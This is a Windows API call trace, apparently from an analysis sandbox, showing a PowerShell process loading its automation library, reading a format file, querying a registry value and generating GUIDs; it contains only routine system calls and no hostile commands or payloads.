	[0288.272] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf7faee09, Data2=0x7431, Data3=0x4f95, Data4=([0]=0xa8, [1]=0xd, [2]=0x2d, [3]=0xe9, [4]=0x99, [5]=0x4b, [6]=0x93, [7]=0x55))) returned 0x0
	[0288.272] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x40213059, Data2=0x20ef, Data3=0x40c9, Data4=([0]=0xb0, [1]=0x43, [2]=0x6b, [3]=0x78, [4]=0x56, [5]=0x5a, [6]=0x4d, [7]=0x89))) returned 0x0
	[0288.272] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x4ac9e3ee, Data2=0x230c, Data3=0x4cd2, Data4=([0]=0xb9, [1]=0xf2, [2]=0x4c, [3]=0x4b, [4]=0x7b, [5]=0x68, [6]=0xb5, [7]=0xe))) returned 0x0
	[0288.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0288.273] SetErrorMode (uMode=0x1) returned 0x1
	[0288.273] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0288.273] GetFileType (hFile=0x1d0) returned 0x1
	[0288.273] SetErrorMode (uMode=0x1) returned 0x1
	[0288.273] GetFileType (hFile=0x1d0) returned 0x1
	[0288.273] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.274] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.274] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.274] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.274] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.274] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.275] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.275] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.275] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.276] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.276] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.276] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.276] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.276] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.276] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.277] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.277] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.278] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.278] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.279] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.279] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0288.279] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0xe67, lpOverlapped=0x0) returned 1
	[0288.280] ReadFile (in: hFile=0x1d0, lpBuffer=0x308cad7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308cad7*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0288.280] ReadFile (in: hFile=0x1d0, lpBuffer=0x308d508, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x308d508*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0288.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0288.280] SetErrorMode (uMode=0x1) returned 0x1
	[0288.280] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0288.281] SetErrorMode (uMode=0x1) returned 0x1
	[0288.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0288.281] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x1d0) returned 0x0
	[0288.281] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0288.281] CoTaskMemAlloc (cb=0x5a) returned 0x37ed30
	[0288.281] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x37ed30, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0288.281] CoTaskMemFree (pv=0x37ed30) 
	[0288.281] RegCloseKey (hKey=0x1d0) returned 0x0
	[0288.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0288.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0288.292] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x2c661e60, Data2=0x1d45, Data3=0x4bf5, Data4=([0]=0x94, [1]=0x58, [2]=0x8c, [3]=0x49, [4]=0xa9, [5]=0xfd, [6]=0xa0, [7]=0xe1))) returned 0x0
	[0288.292] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf57c3f1d, Data2=0x99d8, Data3=0x43b9, Data4=([0]=0xa8, [1]=0x77, [2]=0xf6, [3]=0x10, [4]=0xd7, [5]=0x88, [6]=0x2c, [7]=0x13))) returned 0x0
	[0288.293] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x75aa6ac4, Data2=0x60ad, Data3=0x4899, Data4=([0]=0x9c, [1]=0xef, [2]=0xec, [3]=0x3a, [4]=0xeb, [5]=0xab, [6]=0xe0, [7]=0x59))) returned 0x0
	[0288.293] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x8ff77bf8, Data2=0x1e01, Data3=0x43da, Data4=([0]=0xa9, [1]=0xf1, [2]=0xc4, [3]=0x73, [4]=0x7f, [5]=0x35, [6]=0xe4, [7]=0x57))) returned 0x0
	[0288.293] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xafa56be9, Data2=0x80f3, Data3=0x48e0, Data4=([0]=0x85, [1]=0x8f, [2]=0xa3, [3]=0x7d, [4]=0xdb, [5]=0x6a, [6]=0xc4, [7]=0x24))) returned 0x0
	[0288.293] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd0e0e021, Data2=0xfd1c, Data3=0x487a, Data4=([0]=0xac, [1]=0xc5, [2]=0x90, [3]=0x20, [4]=0x45, [5]=0x96, [6]=0xd8, [7]=0x8d))) returned 0x0
	[0288.294] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x9a2f0682, Data2=0x7011, Data3=0x4423, Data4=([0]=0x8a, [1]=0x64, [2]=0xb4, [3]=0x8a, [4]=0xfb, [5]=0x1a, [6]=0x33, [7]=0x51))) returned 0x0
	[0288.294] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.294] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x2ef7d35b, Data2=0x2efa, Data3=0x4ade, Data4=([0]=0x93, [1]=0x38, [2]=0x80, [3]=0x6e, [4]=0x60, [5]=0x25, [6]=0x1a, [7]=0x5b))) returned 0x0
	[0288.294] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xcbf4da3b, Data2=0x94a6, Data3=0x4ac3, Data4=([0]=0xb0, [1]=0xbe, [2]=0x19, [3]=0x75, [4]=0xb2, [5]=0x5e, [6]=0x4f, [7]=0x6a))) returned 0x0
	[0288.295] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xa98d71b1, Data2=0x1d9b, Data3=0x4452, Data4=([0]=0x84, [1]=0x20, [2]=0x12, [3]=0x81, [4]=0x29, [5]=0xee, [6]=0xea, [7]=0x9e))) returned 0x0
	[0288.295] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x50660610, Data2=0x5be0, Data3=0x4516, Data4=([0]=0xb5, [1]=0xe0, [2]=0x29, [3]=0x42, [4]=0x76, [5]=0xc5, [6]=0x16, [7]=0xff))) returned 0x0
	[0288.295] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd0ec28b5, Data2=0xaa92, Data3=0x4140, Data4=([0]=0xb6, [1]=0xb4, [2]=0x77, [3]=0x98, [4]=0xc2, [5]=0xe, [6]=0x75, [7]=0x20))) returned 0x0
	[0288.295] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xe7fc7b52, Data2=0xf94e, Data3=0x4986, Data4=([0]=0xaf, [1]=0x7b, [2]=0xcc, [3]=0x1e, [4]=0x2b, [5]=0x85, [6]=0x8e, [7]=0x7c))) returned 0x0
	[0288.295] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xa47d5ae4, Data2=0x9380, Data3=0x4887, Data4=([0]=0xba, [1]=0xa3, [2]=0xdd, [3]=0xe1, [4]=0xde, [5]=0xa1, [6]=0x41, [7]=0x17))) returned 0x0
	[0288.296] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xdc83c500, Data2=0x2425, Data3=0x4992, Data4=([0]=0xaf, [1]=0xf, [2]=0xe1, [3]=0x1a, [4]=0xde, [5]=0x88, [6]=0xc, [7]=0x2))) returned 0x0
	[0288.296] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x3c833840, Data2=0x41cb, Data3=0x4ac4, Data4=([0]=0xb3, [1]=0xc5, [2]=0xa9, [3]=0x9d, [4]=0x22, [5]=0x21, [6]=0x54, [7]=0x11))) returned 0x0
	[0288.296] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x994495bc, Data2=0x7510, Data3=0x456a, Data4=([0]=0xb3, [1]=0x77, [2]=0x9c, [3]=0xe5, [4]=0x49, [5]=0x9a, [6]=0xd8, [7]=0x8d))) returned 0x0
	[0288.296] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x8d142950, Data2=0xbf90, Data3=0x4cbb, Data4=([0]=0x84, [1]=0x54, [2]=0x8d, [3]=0xd8, [4]=0xfd, [5]=0x4f, [6]=0xb, [7]=0x7f))) returned 0x0
	[0288.297] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xb81b4095, Data2=0x6268, Data3=0x486b, Data4=([0]=0x9d, [1]=0xd3, [2]=0x39, [3]=0xc4, [4]=0xee, [5]=0x5b, [6]=0xab, [7]=0xd4))) returned 0x0
	[0288.297] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.297] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.297] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.297] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x2151ca35, Data2=0xe9bb, Data3=0x46af, Data4=([0]=0x98, [1]=0x8b, [2]=0xe8, [3]=0xd5, [4]=0xb6, [5]=0xe, [6]=0xc7, [7]=0xeb))) returned 0x0
	[0288.298] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf559b8, Data2=0x7c4a, Data3=0x4ef9, Data4=([0]=0xa3, [1]=0x9d, [2]=0x9, [3]=0x76, [4]=0x46, [5]=0x24, [6]=0xc, [7]=0x8a))) returned 0x0
	[0288.298] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x86c6483b, Data2=0xed25, Data3=0x4d26, Data4=([0]=0x90, [1]=0x19, [2]=0x48, [3]=0x34, [4]=0x82, [5]=0x12, [6]=0xa5, [7]=0x6d))) returned 0x0
	[0288.298] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf1bbd744, Data2=0xb079, Data3=0x4cee, Data4=([0]=0x9a, [1]=0x92, [2]=0xae, [3]=0x37, [4]=0xe1, [5]=0xdf, [6]=0x50, [7]=0x40))) returned 0x0
	[0288.298] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x288c5502, Data2=0xc7a, Data3=0x4ed1, Data4=([0]=0xb0, [1]=0xb9, [2]=0x7f, [3]=0x6, [4]=0x8b, [5]=0x63, [6]=0xae, [7]=0x30))) returned 0x0
	[0288.299] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x99cfa8af, Data2=0x50ae, Data3=0x4bcb, Data4=([0]=0xb7, [1]=0xcb, [2]=0xa5, [3]=0x37, [4]=0xb0, [5]=0x2c, [6]=0xbd, [7]=0xbe))) returned 0x0
	[0288.299] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x5ec3a7eb, Data2=0xecd0, Data3=0x487d, Data4=([0]=0x88, [1]=0x81, [2]=0xb, [3]=0x91, [4]=0x99, [5]=0xbe, [6]=0x5, [7]=0x62))) returned 0x0
	[0288.299] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xe771b420, Data2=0xc279, Data3=0x4d26, Data4=([0]=0x87, [1]=0xea, [2]=0x42, [3]=0x3b, [4]=0x99, [5]=0xf1, [6]=0x34, [7]=0x5))) returned 0x0
	[0288.299] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xf2885f8f, Data2=0x90ba, Data3=0x40d4, Data4=([0]=0x88, [1]=0xa, [2]=0xbc, [3]=0x4f, [4]=0xc5, [5]=0x18, [6]=0x86, [7]=0xb1))) returned 0x0
	[0288.300] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x116371dd, Data2=0x9179, Data3=0x401a, Data4=([0]=0xb3, [1]=0xa8, [2]=0x89, [3]=0xcf, [4]=0x75, [5]=0x62, [6]=0x4f, [7]=0x38))) returned 0x0
	[0288.300] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x531d0f4, Data2=0xfc9f, Data3=0x4971, Data4=([0]=0x80, [1]=0x6e, [2]=0x9d, [3]=0xc9, [4]=0x3f, [5]=0x10, [6]=0xe5, [7]=0xa4))) returned 0x0
	[0288.300] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x78523f40, Data2=0x3c68, Data3=0x4a96, Data4=([0]=0x91, [1]=0xa7, [2]=0xe5, [3]=0x7c, [4]=0x55, [5]=0x0, [6]=0x9e, [7]=0xa2))) returned 0x0
	[0288.300] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xc96433de, Data2=0x79a2, Data3=0x4b85, Data4=([0]=0xa3, [1]=0x86, [2]=0x30, [3]=0x11, [4]=0x3e, [5]=0xdf, [6]=0x2c, [7]=0xb9))) returned 0x0
	[0288.300] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.301] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x61ab6f26, Data2=0xf7f2, Data3=0x4005, Data4=([0]=0xaa, [1]=0x95, [2]=0x40, [3]=0xa4, [4]=0x2d, [5]=0x53, [6]=0x1c, [7]=0x2a))) returned 0x0
	[0288.301] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.302] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.303] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd87ae34a, Data2=0x763e, Data3=0x4bf8, Data4=([0]=0x8d, [1]=0x63, [2]=0x9c, [3]=0x19, [4]=0x8a, [5]=0x36, [6]=0xb6, [7]=0x62))) returned 0x0
	[0288.303] VirtualQuery (in: lpAddress=0x12bec0, lpBuffer=0x12cd80, dwLength=0x30 | out: lpBuffer=0x12cd80*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0288.303] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xa4dfee2b, Data2=0xba10, Data3=0x45ac, Data4=([0]=0xb8, [1]=0x54, [2]=0x8b, [3]=0xf, [4]=0x79, [5]=0xda, [6]=0x23, [7]=0x5c))) returned 0x0
	[0288.304] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xd6442397, Data2=0xee6e, Data3=0x4c7c, Data4=([0]=0x8e, [1]=0xa6, [2]=0xa5, [3]=0x28, [4]=0xc6, [5]=0x55, [6]=0x6a, [7]=0xd))) returned 0x0
	[0288.304] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x3b0f8643, Data2=0xa803, Data3=0x4735, Data4=([0]=0xb4, [1]=0x66, [2]=0xc4, [3]=0x80, [4]=0x7c, [5]=0x18, [6]=0xcc, [7]=0xb8))) returned 0x0
	[0288.304] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x22a7d3d2, Data2=0xbcda, Data3=0x44b7, Data4=([0]=0x87, [1]=0x3, [2]=0xd4, [3]=0xac, [4]=0x7, [5]=0x1f, [6]=0x3f, [7]=0xb))) returned 0x0
	[0288.304] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x862a5d30, Data2=0x1bfe, Data3=0x425c, Data4=([0]=0xb0, [1]=0x6d, [2]=0xa5, [3]=0xad, [4]=0x66, [5]=0xbc, [6]=0x1, [7]=0x55))) returned 0x0
